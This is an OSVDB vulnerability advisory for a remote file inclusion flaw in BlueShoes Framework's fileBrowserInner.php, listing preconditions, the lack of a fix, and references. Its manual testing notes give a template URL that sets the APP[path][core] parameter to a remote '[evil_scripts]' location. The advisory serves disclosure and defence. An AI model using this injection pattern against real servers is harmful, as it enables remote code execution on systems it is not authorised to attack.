BlueShoes Framework filebrowser/fileBrowserInner.php?APP[path][core] Variable Remote File Inclusion

2006-06-03T08:35:31
ID OSVDB:25997
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-06-03T08:35:31

Description

Vulnerability Description

BlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to filebrowser/fileBrowserInner.php not properly sanitizing user input supplied to the 'APP[path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

BlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to filebrowser/fileBrowserInner.php not properly sanitizing user input supplied to the 'APP[path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]

References:

Vendor URL: http://www.blueshoes.org/ Secunia Advisory ID:20438 Related OSVDB ID: 25999 Related OSVDB ID: 26000 Related OSVDB ID: 25998 Related OSVDB ID: 25996 Related OSVDB ID: 26001 Related OSVDB ID: 26002 ISS X-Force ID: 26908 Generic Exploit URL: http://milw0rm.com/exploits/1870 FrSIRT Advisory: ADV-2006-2128 Bugtraq ID: 18261